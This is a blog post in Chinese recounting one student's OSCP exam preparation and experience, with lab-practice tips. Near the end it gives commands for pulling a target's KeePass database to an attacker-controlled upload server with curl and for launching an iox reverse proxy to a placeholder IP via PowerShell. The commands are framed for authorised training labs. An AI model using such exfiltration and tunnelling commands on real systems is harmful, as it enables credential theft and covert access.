本人有幸在2025年4月通过了PEN-200的考试,拿到了OSCP证书,先上图:
简单分享一下我的备考路径:
从我计划报名到考试开始前,HTB+PG总共刷了70个题(lab)左右
我一开始先按照NetSecFocus Trophy Room的清单刷完了HTB的ad域环境(14$/month),之后才报名了PEN-200的考试,报名我建议大家可以在国内找代理商报名,会比官网便宜一些。
在报名后我就购买了Proving Grounds Practice(19$/month),我认为PG靶场还是有必要买的,毕竟是offsec自家的考试和自家的靶场,部分题目做法跟考试很相似(我一个月没刷完清单的题目,买了两个月,在第二个月开始4-5天左右刷完的)。如果你的提权基础一般的话,可以先去看OSCP官方的考试资料提权部分进行学习,之后在开始做lab(我是不太建议都刷完在报名考试,然后直接打pwk接着考试这种)。90天的时间还是比较充分的,本人目前是大学阶段,基本每天4节课(90分钟/节),每天能保持打lab的时间4-5个小时左右,时间安排的比较紧。从报名PEN-200开始,过了差不多40-50天我就预约了考试(差不多提前10天以上才能约到你想要的时间,当然也不排除你运气好的情况下,提前2-3天也有适合你的时间)。
在参考workthrought(wp)这方面,总有不会的题目,我一般尝试1个小时左右如果实在出不来的lab我就会去看。但是尽量不要纯照着复线,一些手法和命令还是需要自己记一下的,我在刷lab记录workthrought的同时,也会有一个.md专门记录命令来当作我的命令速查表。
我的考试预约在上午10点,我9点多就进去监考室等着了,首先监考人员会检查你的身份证件(护照),然后会让你的摄像头环视一下,会看你的桌子。之后就是等到考试正式开始,给你的邮箱发送V*N和账号密码,登陆进去就可以开始考试了。我没有遇到太难的题目,有两个提权卡了一下,是我平时刷lab没遇到过的,幸运的是我在先知社区看过相关的文章,最终经历了8个小时左右我拿到了所有的proof,检查完我的workthrought后结束了考试。
我记录的workthrought全部提交到了github:https://github.com/cyb0rg-se/OSCP-notes,本来是想着都上传到平台的,但是总是图片“转存错误”就跟让我难受了。有需要的师傅们可以自己去看,部分题目网上却是不好搜相关的做法,尤其是pwk靠后的challenge,我也没花精力做出来太多,我把重点放到了OSCP A/B/C以及前面的challenge。目前我的课程还没有结束,可能最近还会去看看没做出来的题目。
最后就是一些技巧:
offsec的lab提供的V*N延迟真的很大,我的解决办法是利用这篇文章,购买一个阿里云的新加坡服务器(pg的靶场好像也在新加坡,延迟3-4ms很低,而且阿里云国外服务器好像有三网加速,哪家运营商都很快),国内到阿里云新加坡服务器的延迟在180ms左右。但是我不建议按照刚刚的文章一样搭建ssh隧道,比较容易被…,懂得都懂。我使用的是这篇文章,可以有效防止被…。kali下载clash开tun可以实现丝滑的刷lab,RDP很丝滑,流量截止我考试用了20多个G吧。但是切记:搭建隧道的时候避开80端口,我用的是81和443。 因为部分题目有防火墙,不是每个端口都能弹出shell,所以80这个超常见端口就非常重要。
我只有nmap是在服务器上进行的,因为真的很快。其他操作我是利用frp把我kali的一些端口,比如80,8080等等这些常见端口转发出来了。因为是在VPS上连接VPN的,不转发端口你只能在VPS上接shell或是起python m传工具,所以我还是建议frp转发kali的端口到你的VPS上。当然也不乏有在V*N配置文件首行添加proxy 127.0.0.1 7890这种操作,但是我这样连接确实不太稳定,所以不推荐。
还有一个很好用的工具:miniserve
在打lab时候,会经常需要传输靶机的一些文件到你的kali,我是不太喜欢用smb的(win靶机),所以我采用miniserve。下面是一个实例
kali(攻击机)运行(PS:目录一定要有写入权限)
miniserve -p 80 . -u --
然后靶机可以使用curl上传,比如上传C:\Users\milana\Documents\Database.kdbx"
curl -F "path=@C:\Users\milana\Documents\Database.kdbx" http://{你的服务IP}/upload?path=/
windows靶机你可能需要先上传一个curl.exe
最后是搭建隧道方面,shell是比较珍贵的,所以代理工具尽量后台运行,linux使用nohup或者其他就行,方法很多,但是pspy32s不能在后台运行,所以搭配timeout命令食用,在60s过后会自动结束pspy32s
timeout 60s ./pspy32s
windows主要是利用powershell,我代理用的是iox,就给iox的,其他工具改一下用就行
Start-Process -FilePath ".\iox.exe" -ArgumentList "proxy -r {yourIP}:{yourPROT}"
或者
Start-Process -FilePath ".\iox.exe" -ArgumentList "proxy -r {yourIP}:{yourPROT}" -NoNewWindow
就这么多,写不动了(:
扫一扫
775
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
